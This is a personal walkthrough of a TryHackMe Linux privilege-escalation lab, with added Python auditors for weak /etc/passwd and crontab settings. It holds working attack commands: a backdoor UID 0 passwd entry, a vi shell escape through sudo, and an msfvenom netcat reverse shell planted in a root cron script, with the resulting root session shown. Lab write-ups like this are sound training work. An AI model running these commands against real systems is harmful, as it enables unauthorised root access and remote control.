Probably the easiest privilege escalation room on TryHackMe.
I always struggle with escalation, so I'm putting this together as a writeup partly for my own review.
To avoid spoilers I've tried not to write the answers out directly.
Task4 Enumeration
Using LinEnum
It says to keep this somewhere because it's a useful tool, so I'm following that (but I keep forgetting and download it again every time).
Enumerating with LinEnum
First, SSH in with the ID and password given in the task
nmz@kali:~$ ssh user3@10.10.139.78
user3@polobox:~$
Start a web server on the local machine, in the directory where LinEnum is kept
nmz@kali:~/work/LinEnum$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
On the target machine, download LinEnum with wget and run it. Save the results to output.txt so they can be referred back to later.
user3@polobox:~$ wget 10.4.20.231:8000/LinEnum.sh
--2020-11-27 05:58:29-- http://10.4.20.231:8000/LinEnum.sh
Connecting to 10.4.20.231:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: ‘LinEnum.sh’
LinEnum.sh 100%[==================================>] 45.54K 56.5KB/s in 0.8s
2020-11-27 05:58:31 (56.5 KB/s) - ‘LinEnum.sh’ saved [46631/46631]
user3@polobox:~$ chmod +x LinEnum.sh
user3@polobox:~$ ./LinEnum.sh |tee output.txt
Reading the LinEnum results
Check the number of users
[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false
ntp:x:109:119::/home/ntp:/bin/false
avahi:x:110:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:111:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
nm-openconnect:x:114:124:NetworkManager OpenConnect plugin,,,:/var/lib/NetworkManager:/bin/false
nm-openvpn:x:115:125:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/bin/false
pulse:x:116:126:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:117:128:RealtimeKit,,,:/proc:/bin/false
saned:x:118:129::/var/lib/saned:/bin/false
usbmux:x:119:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
geoclue:x:103:105::/var/lib/geoclue:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
user1:x:1000:1000:user1,,,:/home/user1:/bin/bash
user2:x:1001:1001:user2,,,:/home/user2:/bin/bash
user3:x:1002:1002:user3,,,:/home/user3:/bin/bash
user4:x:1003:1003:user4,,,:/home/user4:/bin/bash
statd:x:120:65534::/var/lib/nfs:/usr/sbin/nologin
user5:x:1004:1004:user5,,,:/home/user5:/bin/bash
user6:x:1005:1005:user6,,,:/home/user6:/bin/bash
mysql:x:121:131:MySQL Server,,,:/var/mysql:/bin/bash
user7:x:1006:0:user7,,,:/home/user7:/bin/bash
user8:x:1007:1007:user8,,,:/home/user8:/bin/bash
sshd:x:122:65534::/run/sshd:/usr/sbin/nologin
Check the available shells
[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
Check cron
[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/5 * * * * root /home/user4/Desktop/autoscript.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
Readable files
[-] Can we read/write sensitive files:
-rw-rw-r-- 1 root root 2694 Mar 6 2020 /etc/passwd
-rw-r--r-- 1 root root 1087 Jun 5 2019 /etc/group
-rw-r--r-- 1 root root 581 Apr 22 2016 /etc/profile
-rw-r----- 1 root shadow 2359 Mar 6 2020 /etc/shadow
Task5 Abusing SUID/GUID Files
Exploiting with SUID/GUID files
Look at user3's home directory
The entry called shell is highlighted in red and stands out
user3@polobox:~$ ls -l
total 180
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Desktop
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Documents
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Downloads
-rwxrwxr-x 1 user3 user3 46631 Nov 27 05:46 LinEnum.sh
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Music
-rw-rw-r-- 1 user3 user3 89918 Nov 27 06:01 output.txt
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Pictures
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Public
-rwsr-xr-x 1 root root 8392 Jun 4 2019 shell
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Templates
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Videos
Running shell gives you root
Being told "Congratulations!" doesn't give any sense of achievement, though...
Task6 Exploiting Writeable /etc/passwd
Exploiting /etc/passwd
This assumes we already know that user7 is a member of the root group, and so user7 can apparently edit /etc/passwd.
Add a new user
Generate a password hash with the openssl command
user7@polobox:/home/user3$ openssl passwd -1 -salt new 123
$1$new$p7ptkEKU1HnaHpRtzNizS1
Write the new user as the last line of /etc/passwd
nano /etc/passwd
...
new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
Save with Ctrl+X and log in as the new user
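The Task 4 listing already shows the two things that make Task 6 work: /etc/passwd is group-writable (-rw-rw-r-- root root) and user7 has primary group 0, and the exploit then appends a UID 0 entry with its hash inline. Here is a small auditor for exactly those conditions, added here as an example and not taken from the room or from LinEnum; the sample lines are constructed from the entries shown above.

```python
import stat

LOCKED = {"x", "*", "!", "!!"}  # values meaning "hash is in /etc/shadow" or "locked"

def parse_passwd(text):
    """Yield (name, pw, uid, gid, shell) for each well-formed /etc/passwd line."""
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7 or line.startswith("#"):
            continue  # skip blanks, comments and malformed entries
        name, pw, uid, gid, _gecos, _home, shell = fields
        if not (uid.isdigit() and gid.isdigit()):
            continue
        yield name, pw, int(uid), int(gid), shell

def audit_passwd(text):
    """Return (account, reason) findings for the conditions abused above."""
    findings = []
    for name, pw, uid, gid, _shell in parse_passwd(text):
        if uid == 0 and name != "root":
            findings.append((name, "UID 0 account other than root"))
        if gid == 0 and name != "root":
            findings.append((name, "primary group is root (GID 0)"))
        if pw == "":
            findings.append((name, "empty password field"))
        elif pw not in LOCKED:
            findings.append((name, "password hash stored in /etc/passwd"))
    return findings

def passwd_mode_is_safe(mode):
    """/etc/passwd must not be group- or world-writable (0644 is the norm)."""
    return not mode & (stat.S_IWGRP | stat.S_IWOTH)

# Constructed sample: a few entries from the LinEnum output above plus the
# line the Task 6 exploit appends.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user3:x:1002:1002:user3,,,:/home/user3:/bin/bash
user7:x:1006:0:user7,,,:/home/user7:/bin/bash
new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
"""

if __name__ == "__main__":
    for account, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"{account}: {reason}")
    print("mode 0664 safe?", passwd_mode_is_safe(0o664))  # False: group root can write
```

On a real host, feed it open("/etc/passwd").read() and os.stat("/etc/passwd").st_mode; the 0664 mode from the listing above is what lets user7 write the file.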
Task7 Escaping Vi Editor
Privilege escalation using vi
Switch to user8 and check sudo
user8@polobox:/home/user7$ sudo -l
Matching Defaults entries for user8 on polobox:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User user8 may run the following commands on polobox:
(root) NOPASSWD: /usr/bin/vi
This shows sudo vi can be run without a password
user8@polobox:/home/user7$ sudo vi
Open vi and, on its screen, type
:!sh
and when it returns you're root. Amazing.
Task8 Exploiting Crontab
Use autoscript.sh, which cron runs
Using msfvenom
# look at the help
nmz@kali:~/THM/CommonLinuxPrivesc$ msfvenom -help
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
Options:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--service-name <value> The service name to use when generating a service binary
--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
--smallest Generate the smallest possible payload using all available encoders
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
--encrypt-key <value> A key to be used for --encrypt
--encrypt-iv <value> An initialization vector for --encrypt
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for certain output formats
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
-h, --help Show this message
# create the shell
nmz@kali:~/THM/CommonLinuxPrivesc$ msfvenom -p cmd/unix/reverse_netcat lhost=10.4.20.231 lport=8888 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 89 bytes
mkfifo /tmp/yflk; nc 10.4.20.231 8888 0</tmp/yflk | /bin/sh >/tmp/yflk 2>&1; rm /tmp/yflk
# write the script msfvenom produced to a file with echo
nmz@kali:~/THM/CommonLinuxPrivesc$ echo 'mkfifo /tmp/yflk; nc 10.4.20.231 8888 0</tmp/yflk | /bin/sh >/tmp/yflk 2>&1; rm /tmp/yflk' > autoscript.sh
nmz@kali:~/THM/CommonLinuxPrivesc$ ls
autoscript.sh
nmz@kali:~/THM/CommonLinuxPrivesc$ cat autoscript.sh
mkfifo /tmp/yflk; nc 10.4.20.231 8888 0</tmp/yflk | /bin/sh >/tmp/yflk 2>&1; rm /tmp/yflk
Place the file we made
Transfer it to the target machine with the same steps used for LinEnum
user4@polobox:~/Desktop$ cp autoscript.sh bk_autoscript.sh
user4@polobox:~/Desktop$ ls
autoscript.sh computer.desktop network.desktop settings.desktop
bk_autoscript.sh helpmanual.desktop recyclebin.desktop userfiles.desktop
user4@polobox:~/Desktop$ wget 10.4.20.231:8000/autoscript.sh
--2020-11-29 22:12:02-- http://10.4.20.231:8000/autoscript.sh
Connecting to 10.4.20.231:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 90 [text/x-sh]
Saving to: ‘autoscript.sh.1’
autoscript.sh.1 100%[===================>] 90 --.-KB/s in 0s
2020-11-29 22:12:03 (13.6 MB/s) - ‘autoscript.sh.1’ saved [90/90]
user4@polobox:~/Desktop$ ls
autoscript.sh computer.desktop recyclebin.desktop
autoscript.sh.1 helpmanual.desktop settings.desktop
bk_autoscript.sh network.desktop userfiles.desktop
user4@polobox:~/Desktop$ rm autoscript.sh
user4@polobox:~/Desktop$ cp autoscript.sh.1 autoscript.sh
user4@polobox:~/Desktop$ cat autoscript.sh
mkfifo /tmp/yflk; nc 10.4.20.231 8888 0</tmp/yflk | /bin/sh >/tmp/yflk 2>&1; rm /tmp/yflk
Then start nc on the local side and wait for the cron job, which fires once every 5 minutes
nmz@kali:~/THM/CommonLinuxPrivesc$ nc -lvp 8888
listening on [any] 8888 ...
10.10.223.125: inverse host lookup failed: Unknown host
connect to [10.4.20.231] from (UNKNOWN) [10.10.223.125] 46966
whoami
root
The first time I tried, I waited and waited but never got a shell; when I redid it, it worked. (cause unknown)
If anyone is stuck after a failure, it might be worth trying a few more times.
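The root cause here is the crontab line seen in Task 4: a job running as root whose script sits in a user's home directory. The following check, added as an example and not part of the room or this writeup, parses /etc/crontab-format text and flags root jobs whose target is outside system directories, not owned by root, group/world-writable, or not yet present; the uid and mode used for autoscript.sh in the fake stat are assumed, since the room never shows them.

```python
import os
import stat
from types import SimpleNamespace

SYSTEM_PREFIXES = ("/etc/", "/usr/", "/sbin/", "/bin/", "/opt/")  # root-only trees

def parse_crontab(text):
    """Yield (schedule, user, command) from /etc/crontab-style text."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value assignment
        parts = line.split(None, 6)  # 5 schedule fields, user, command
        if len(parts) == 7:
            yield " ".join(parts[:5]), parts[5], parts[6]

def script_risks(path, stat_fn=os.stat):
    """Reasons `path` is unsafe as a root cron target (empty list = fine)."""
    reasons = []
    if not path.startswith("/"):
        return reasons  # bare command, resolved through the crontab PATH
    if not path.startswith(SYSTEM_PREFIXES):
        reasons.append("lives outside system directories")
    try:
        st = stat_fn(path)
    except FileNotFoundError:
        return reasons + ["target does not exist yet"]  # could be planted later
    if st.st_uid != 0:
        reasons.append("not owned by root")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("group- or world-writable")
    return reasons

def audit_crontab(text, stat_fn=os.stat):
    """Return (path, reason) findings for every job that runs as root."""
    return [(cmd.split()[0], r) for _, user, cmd in parse_crontab(text)
            if user == "root" for r in script_risks(cmd.split()[0], stat_fn)]

# Constructed stand-in for os.stat so this runs offline; the uid/mode of
# autoscript.sh are assumed (owned by user4, not root), not taken from the room.
FAKE_FILES = {"/home/user4/Desktop/autoscript.sh": SimpleNamespace(st_uid=1003, st_mode=0o100755)}
def fake_stat(path):
    if path in FAKE_FILES:
        return FAKE_FILES[path]
    raise FileNotFoundError(path)
SAMPLE_CRONTAB = """\
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/5 * * * * root /home/user4/Desktop/autoscript.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
"""
```

On a real host call audit_crontab(open("/etc/crontab").read()) with the default os.stat; files under /etc/cron.d use the same format and can be fed through the same function.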